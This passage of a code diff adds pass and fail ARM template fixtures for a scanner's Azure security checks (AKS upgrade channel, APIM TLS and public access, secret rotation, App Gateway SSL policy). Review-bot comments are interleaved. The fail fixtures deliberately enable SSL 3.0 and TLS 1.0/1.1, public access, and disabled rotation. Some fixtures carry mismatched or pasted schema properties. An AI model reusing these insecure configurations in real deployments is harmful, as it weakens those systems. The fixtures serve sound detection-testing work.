"allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2022-01-02-preview", + "name": "fail", + "location": "[parameters('location')]", + "tags": { + "displayname": "AKS Cluster" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableRBAC": true, + "dnsPrefix": "[parameters('dnsPrefix')]", + "autoUpgradeProfile": { + "upgradeChannel": "none" + }, + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osType": "[parameters('osType')]", + "type": "VirtualMachineScaleSets", + "mode": "System" + } + ] + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json new file mode 100644 index 00000000000..129713d935e --- /dev/null +++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json 
@@ -0,0 +1,104 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2022-01-02-preview", + "name": "fail1", + "location": "[parameters('location')]", + "tags": { + "displayname": "AKS Cluster" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableRBAC": true, + "dnsPrefix": "[parameters('dnsPrefix')]", + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osType": "[parameters('osType')]", + "type": "VirtualMachineScaleSets", + "mode": "System" + } + ] + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json new file mode 100644 index 00000000000..1bf35f9b808 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json 
@@ -0,0 +1,107 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2022-01-02-preview", + "name": "pass", + "location": "[parameters('location')]", + "tags": { + "displayname": "AKS Cluster" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableRBAC": true, + "dnsPrefix": "[parameters('dnsPrefix')]", + "autoUpgradeProfile": { + "upgradeChannel": "stable" + }, + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osType": "[parameters('osType')]", + "type": "VirtualMachineScaleSets", + "mode": "System" + } + ] + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json b/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json new file mode 100644 index 00000000000..ee715726b3b --- /dev/null +++ b/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json 
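Review bot: The three fixtures cover only `"none"`, an absent `autoUpgradeProfile`, and `"stable"`; `patch`, `rapid` and `node-image` are the other documented `upgradeChannel` values and none is exercised, so the check's treatment of them is untested. `node-image` is the interesting one since, as far as I know, it refreshes node OS images but does not move the Kubernetes version, so whether it should pass depends on the check's intent; a `node_image_pass.json` or `node_image_fail.json` fixture would pin that decision. A template could also leave `autoUpgradeProfile` present but empty (`"autoUpgradeProfile": {}`), which neither fail fixture covers.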
@@ -0,0 +1,149 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "15176578550391235821" + } + }, + "parameters": { + "publisherEmail": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The email address of the owner of the service" + } + }, + "publisherName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The name of the owner of the service" + } + }, + "sku": { + "type": "string", + "defaultValue": "Developer", + "allowedValues": [ + "Consumption", + "Developer", + "Basic", + "Basicv2", + "Standard", + "Standardv2", + "Premium" + ], + "metadata": { + "description": "The pricing tier of this API Management service" + } + }, + "skuCount": { + "type": "int", + "defaultValue": 1, + "allowedValues": [ + 0, + 1, + 2 + ], + "metadata": { + "description": "The instance size of this API Management service." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ApiManagement/service", + "apiVersion":"2023-05-01-preview", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]", + "customProperties":{ + "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Ssl30": true + } + } + }, + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2023-05-01-preview", + "name": "fail2", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]", + "customProperties":{ + "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls10": true + } + } + }, + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2023-05-01-preview", + "name": "fail3", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]", + "customProperties":{ + "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Ssl30": true + } + } + }, + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2023-05-01-preview", + "name": "fail4", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]", + "customProperties":{ + "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10": true + } + } + }, + { + "type": 
"Microsoft.ApiManagement/service", + "apiVersion": "2023-05-01-preview", + "name": "fail5", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]", + "customProperties":{ + "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls11": true + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json b/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json new file mode 100644 index 00000000000..7df9a815b6a --- /dev/null +++ b/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json 
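Review bot: The five failing resources cover backend `Ssl30`/`Tls10` and frontend `Ssl30`/`Tls10`/`Tls11`, but `Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls11` is missing, so a template that re-enables TLS 1.1 toward backends only is not covered by this test set even if the check handles it. Every value is also written as the JSON boolean `true`, whereas APIM's `customProperties` is a string map and deployed templates carry `"True"`/`"true"`/`"False"`; at least one fail fixture with the string form, `"Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10": "True"`, would confirm the check does not let such a template through by comparing against the boolean only. Mixed-case `"true"` is worth a variant too if the comparison is case-sensitive.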
@@ -0,0 +1,78 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "15176578550391235821" + } + }, + "parameters": { + "publisherEmail": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The email address of the owner of the service" + } + }, + "publisherName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The name of the owner of the service" + } + }, + "sku": { + "type": "string", + "defaultValue": "Developer", + "allowedValues": [ + "Consumption", + "Developer", + "Basic", + "Basicv2", + "Standard", + "Standardv2", + "Premium" + ], + "metadata": { + "description": "The pricing tier of this API Management service" + } + }, + "skuCount": { + "type": "int", + "defaultValue": 1, + "allowedValues": [ + 0, + 1, + 2 + ], + "metadata": { + "description": "The instance size of this API Management service." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "resources": [ + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2023-05-01-preview", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "publisherEmail": "[parameters('publisherEmail')]", + "publisherName": "[parameters('publisherName')]" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json b/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json new file mode 100644 index 00000000000..5dc9e465e78 --- /dev/null +++ b/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json 
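Review bot: `pass` has no `customProperties` at all, so the only compliant case passes by absence and relies on the service default for these flags being off, which the fixture cannot demonstrate. An explicit pass fixture with the legacy protocols disabled, e.g. `"Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10": "False"` alongside the `Tls11`, `Ssl30` and `Backend.*` keys, would show the check reads the value rather than keying on presence. Since `customProperties` values are strings in the APIM schema, the string form is the one real templates use and should be what the pass case exercises.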
@@ -0,0 +1,103 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.20.4.51522", + "templateHash": "6577944355650859703" + } + }, + "parameters": { + "publisherEmail": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The email address of the owner of the service" + } + }, + "publisherName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The name of the owner of the service" + } + }, + "sku": { + "type": "string", + "defaultValue": "Developer", + "allowedValues": [ + "Basic", + "Consumption", + "Developer", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of this API Management service" + } + }, + "skuCount": { + "type": "int", + "defaultValue": 1, + "metadata": { + "description": "The instance size of this API Management service." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2021-08-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "administratorLogin": "jonasAdmin", + "version": "12.0", + "state": "Ready", + "fullyQualifiedDomainName": "jonas.database.windows.net", + "privateEndpointConnections": [], + "minimalTlsVersion": "None", + "restrictOutboundNetworkAccess": "Disabled" + + }, + "identity": { + "type": "SystemAssigned" + } + }, + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2021-08-01", + "name": "fail2", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "administratorLogin": "jonasAdmin", + "version": "12.0", + "state": "Ready", + "fullyQualifiedDomainName": "jonas.database.windows.net", + "privateEndpointConnections": [], + "minimalTlsVersion": "None", + "publicNetworkAccess": "Enabled", + "restrictOutboundNetworkAccess": "Disabled" + }, + "identity": { + "type": "SystemAssigned" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json b/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json new file mode 100644 index 00000000000..1c2d7b09091 --- /dev/null +++ b/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json 
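Review bot: Both resources carry `administratorLogin`, `version`, `fullyQualifiedDomainName`, `minimalTlsVersion` and `restrictOutboundNetworkAccess`, which are `Microsoft.Sql/servers` properties pasted into a `Microsoft.ApiManagement/service` resource, while the required `publisherEmail`/`publisherName` declared in `parameters` are never used. The fixture still drives the check (`publicNetworkAccess` absent in `fail`, `"Enabled"` in `fail2`), but anyone reading it as an APIM example is misled; I would replace the properties with `"publisherEmail": "[parameters('publisherEmail')]"`, `"publisherName": "[parameters('publisherName')]"` plus `publicNetworkAccess`. The `"minimalTlsVersion": "None"` line is the most confusing since it looks like a TLS finding on APIM that the sibling `APIManagementMinTLS12` check will never see. The same applies to `pass.json` in the next hunk.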
@@ -0,0 +1,81 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.20.4.51522", + "templateHash": "6577944355650859703" + } + }, + "parameters": { + "publisherEmail": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The email address of the owner of the service" + } + }, + "publisherName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "The name of the owner of the service" + } + }, + "sku": { + "type": "string", + "defaultValue": "Developer", + "allowedValues": [ + "Basic", + "Consumption", + "Developer", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of this API Management service" + } + }, + "skuCount": { + "type": "int", + "defaultValue": 1, + "metadata": { + "description": "The instance size of this API Management service." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "resources": [ + + { + "type": "Microsoft.ApiManagement/service", + "apiVersion": "2021-08-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]", + "capacity": "[parameters('skuCount')]" + }, + "properties": { + "administratorLogin": "jonasAdmin", + "version": "12.0", + "state": "Ready", + "fullyQualifiedDomainName": "jonas.database.windows.net", + "privateEndpointConnections": [], + "minimalTlsVersion": "None", + "publicNetworkAccess": "Disabled", + "restrictOutboundNetworkAccess": "Disabled" + }, + "identity": { + "type": "SystemAssigned" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json new file mode 100644 index 00000000000..f3a932c8fca --- /dev/null 
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json
@@ -0,0 +1,51 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "aksResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "AKS Cluster Resource ID"
+ }
+ },
+ "aksResourceLocation": {
+ "type": "string",
+ "metadata": {
+ "description": "Location of the AKS resource e.g. \"East US\""
+ }
+ },
+ "aksResourceTagValues": {
+ "type": "object",
+ "metadata": {
+ "description": "Existing all tags on AKS Cluster Resource"
+ }
+ },
+ "workspaceResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "Azure Monitor Log Analytics Resource ID"
+ }
+ }
+ },
+ "resources": [
+ {
+ "name": "fail",
+ "type": "Microsoft.ContainerService/managedClusters",
+ "location": "[parameters('aksResourceLocation')]",
+ "tags": "[parameters('aksResourceTagValues')]",
+ "apiVersion": "2018-03-31",
+ "properties": {
+ "mode": "Incremental",
+ "id": "[parameters('aksResourceId')]",
+ "addonProfiles": {
+ "omsagent": {
+ "enabled": true,
+ "config": {
+ "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+ }
+ }
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json
new file mode 100644
index 00000000000..95dfac7b97d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json
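Review bot: `fail` has no `azureKeyvaultSecretsProvider` entry at all, so this fixture makes a cluster that does not use the Key Vault CSI addon fail the rotation check; if the intent is "rotation must be on when the provider is enabled", absence should arguably be a pass or UNKNOWN rather than a finding, and that decision should be made deliberately and documented on the check. The `"mode": "Incremental"` and `"id"` keys inside `properties` are deployment-level fields, not `managedClusters` properties, and look carried over from the monitoring-onboarding template this was copied from; they are harmless to the check but make the fixture a poor schema example. `apiVersion` `2018-03-31` also predates the secrets-store addon as far as I know, so a real template enabling it would use a newer version.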
@@ -0,0 +1,57 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "aksResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "AKS Cluster Resource ID"
+ }
+ },
+ "aksResourceLocation": {
+ "type": "string",
+ "metadata": {
+ "description": "Location of the AKS resource e.g. \"East US\""
+ }
+ },
+ "aksResourceTagValues": {
+ "type": "object",
+ "metadata": {
+ "description": "Existing all tags on AKS Cluster Resource"
+ }
+ },
+ "workspaceResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "Azure Monitor Log Analytics Resource ID"
+ }
+ }
+ },
+ "resources": [
+ {
+ "name": "fail1",
+ "type": "Microsoft.ContainerService/managedClusters",
+ "location": "[parameters('aksResourceLocation')]",
+ "tags": "[parameters('aksResourceTagValues')]",
+ "apiVersion": "2018-03-31",
+ "properties": {
+ "mode": "Incremental",
+ "id": "[parameters('aksResourceId')]",
+ "addonProfiles": {
+ "omsagent": {
+ "enabled": true,
+ "config": {
+ "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+ }
+ },
+ "azureKeyvaultSecretsProvider": {
+ "enabled": true,
+ "config": {
+ "enableSecretRotation": false
+ }
+ }
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json
new file mode 100644
index 00000000000..30c585cec84
--- /dev/null
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json
@@ -0,0 +1,57 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "aksResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "AKS Cluster Resource ID"
+ }
+ },
+ "aksResourceLocation": {
+ "type": "string",
+ "metadata": {
+ "description": "Location of the AKS resource e.g. \"East US\""
+ }
+ },
+ "aksResourceTagValues": {
+ "type": "object",
+ "metadata": {
+ "description": "Existing all tags on AKS Cluster Resource"
+ }
+ },
+ "workspaceResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "Azure Monitor Log Analytics Resource ID"
+ }
+ }
+ },
+ "resources": [
+ {
+ "name": "pass",
+ "type": "Microsoft.ContainerService/managedClusters",
+ "location": "[parameters('aksResourceLocation')]",
+ "tags": "[parameters('aksResourceTagValues')]",
+ "apiVersion": "2018-03-31",
+ "properties": {
+ "mode": "Incremental",
+ "id": "[parameters('aksResourceId')]",
+ "addonProfiles": {
+ "omsagent": {
+ "enabled": true,
+ "config": {
+ "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+ }
+ },
+ "azureKeyvaultSecretsProvider": {
+ "enabled": true,
+ "config": {
+ "enableSecretRotation": true
+ }
+ }
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
new file mode 100644
index 00000000000..9bdb234f4fd
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
@@ -0,0 +1,226 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "empty_sslPolicy_fail1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "disabledSslProtocols": "TLSv1_0" + } + } + } + ] +} 
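Review bot: The file is named empty_sslPolicy_fail1, but its sslPolicy is not empty — it sets `"disabledSslProtocols": "TLSv1_0"`, so the fixture exercises a "disabledSslProtocols without policyType/minProtocolVersion" path rather than an empty object. Also, disabledSslProtocols is an array in the Application Gateway schema; a bare string here means a check that iterates the value would walk it character by character, which may or may not be what the fail expectation relies on. Either rename the fixture or make sslPolicy genuinely `{}`, and if the scalar form is intentional give the list form its own fixture with `"disabledSslProtocols": ["TLSv1_0"]`.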
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json
new file mode 100644
index 00000000000..f30451083f4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json
@@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
